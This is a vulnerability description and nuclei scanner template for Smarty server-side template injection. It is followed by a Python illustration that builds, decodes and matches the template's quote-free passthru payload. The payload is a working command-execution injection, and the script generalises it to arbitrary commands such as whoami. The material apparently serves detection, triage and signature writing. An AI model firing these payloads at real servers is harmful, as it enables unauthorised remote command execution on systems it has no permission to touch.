Vulnerability description

Smarty is a PHP template engine. When an application renders attacker-controlled text as a Smarty template, the template can call PHP functions directly, and a single injected expression becomes remote command execution. The nuclei template below (id smarty-ssti) probes for this with one GET request per parameter: the payload spells the string "chr" with Smarty's cat modifier (chr(99)|cat:chr(104)|cat:chr(114)), maps chr over the byte values [105,100] with array_map to obtain "id", joins the result with implode, and hands it to passthru(). Because the argument is built from numeric byte values, the payload contains no quote characters and survives contexts that escape or strip them. The matcher then looks for the id output (uid=... gid=...) in the response body. The check only fires where passthru is reachable from templates, i.e. not blocked by a Smarty security policy or by PHP's disable_functions.
id: smarty-ssti

info:
  name: Smarty - Server Side Template Injection
  author: ritikchaddha
  severity: high
  description: |
    In PHP template engine Smarty, template injection is possible by exploiting the passthru function combined with array_map and chr.
  reference:
    - https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation
  metadata:
    max-request: 1
  tags: smarty,ssti,dast,vuln

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      injection:
        - "{{passthru(implode(Null,array_map(chr(99)|cat:chr(104)|cat:chr(114),[105,100])))}}"

    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{injection}}"

    skip-variables-check: true

    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"
# digest: 4a0a00473045022004c212da2f8b81a0f6c5ad987105d2afba2f93605790a77ba23b8eb950c09edf022100f2b45fa9edd071b1a2a0be1b4c457b493b452dcbc09aa3583ccebec9212782a9:922c64590222798bb761d5b6d8e72950
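Worked example, added here and not part of the nuclei template or of Smarty's own code: Python that rebuilds the template's payload for an arbitrary command (build_payload("id") yields exactly the string in the template above), reduces such a payload back to the PHP call it performs by emulating the Smarty pieces it relies on (chr, the cat modifier, array_map, implode), and runs the template's regex matcher over two constructed response bodies. The function names, the generalisation to other commands, and the sample responses are all assumptions made for this illustration.

```python
import re

# Added example (not code from the nuclei template or from Smarty): the Smarty
# functions the payload relies on (chr, the cat modifier, array_map, implode)
# are emulated here in Python so the obfuscated expression can be built and
# reduced offline.


def smarty_cat_chain(word: str) -> str:
    """Spell `word` as chr(n)|cat:chr(m)|..., the way the template spells "chr"."""
    return "|cat:".join(f"chr({ord(c)})" for c in word)


def smarty_byte_list(text: str) -> str:
    """Spell `text` as a Smarty array literal of byte values, e.g. "id" -> [105,100]."""
    return "[" + ",".join(str(ord(c)) for c in text) + "]"


def build_payload(command: str = "id", func: str = "passthru") -> str:
    """Reproduce the template's payload shape for an arbitrary command.

    build_payload("id") returns exactly the string used in the template; the
    result never contains a quote character, only digits and punctuation.
    """
    return (
        "{{" + func + "(implode(Null,array_map("
        + smarty_cat_chain("chr") + "," + smarty_byte_list(command)
        + ")))}}"
    )


_PAYLOAD_RE = re.compile(
    r"\{\{(\w+)\(implode\(Null,array_map\((.*?),\[([\d,]+)\]\)\)\)\}\}"
)


def decode_payload(payload: str) -> str:
    """Reduce a payload of the template's shape to the PHP call it performs.

    chr(99)|cat:chr(104)|cat:chr(114) -> "chr"; array_map("chr", [105,100])
    -> ["i", "d"]; implode(Null, ...) -> "id"; so the call is passthru("id").
    """
    m = _PAYLOAD_RE.fullmatch(payload)
    if m is None:
        raise ValueError("not a payload of the template's shape")
    func, callback_expr, byte_codes = m.groups()
    # Evaluate the chr()|cat:chr() chain that names the array_map callback.
    callback = "".join(
        chr(int(n)) for n in re.findall(r"chr\((\d+)\)", callback_expr)
    )
    if callback != "chr":
        raise ValueError(f"unexpected array_map callback {callback!r}")
    # Evaluate array_map("chr", [...]) followed by implode(Null, ...).
    argument = "".join(chr(int(n)) for n in byte_codes.split(","))
    return f'{func}("{argument}")'


# The template's matcher: a regex over the response body.
_MATCHER = re.compile(r"uid=[0-9]+.*gid=[0-9]+.*")


def matches_template(body: str) -> bool:
    """True when the response body satisfies the template's regex matcher."""
    return _MATCHER.search(body) is not None


# Constructed sample responses (not captured from any real target).
VULNERABLE_RESPONSE = (
    "<h1>Search results</h1>\n"
    "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"
)
# A target that merely echoes the parameter back, unevaluated, must not match.
SAFE_RESPONSE = (
    "<h1>Search results</h1>\n"
    "No results for " + build_payload("id") + "\n"
)


if __name__ == "__main__":
    payload = build_payload("id")
    print(payload)
    print(decode_payload(payload))
    print(decode_payload(build_payload("whoami")))
    print(matches_template(VULNERABLE_RESPONSE), matches_template(SAFE_RESPONSE))
```

The decoder is deliberately strict about shape: a payload whose array_map callback does not reduce to "chr" is rejected rather than guessed at, which is the behaviour you want when triaging scanner findings or writing a WAF or IDS signature for this payload family. The constructed SAFE_RESPONSE illustrates why the matcher keys on command output rather than on the payload text: a page that reflects the injected string unevaluated is not vulnerable and produces no uid=/gid= output.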